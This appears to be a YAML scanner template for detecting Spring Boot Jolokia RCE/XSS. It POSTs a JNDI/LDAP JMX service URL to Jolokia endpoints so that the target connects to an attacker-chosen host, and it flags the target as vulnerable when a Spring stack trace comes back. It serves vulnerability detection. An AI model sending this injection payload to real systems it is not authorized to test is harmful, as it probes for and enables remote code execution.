id: spring-jolokia-rce
info:
  name: Spring Jolokia RCE & XSS
  risk: High

params:
  - dest: localhost:9092
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'actuator, api, admin, eureka'

variables:
  - vul: |
      /jolokia/
      /monitoring/json/
requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      {
          "type" : "read",
          "mbean" : "java.lang:type=Memory",
          "target" : { 
              "url" : "service:jmx:rmi:///jndi/ldap://{{.dest}}/jmxrmi"
          } 
      }
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'springframework.') && StringSearch("response", 'stacktrace')

references:
  - link: https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
  - tool: https://github.com/LandGrey/SpringBootVulExploit
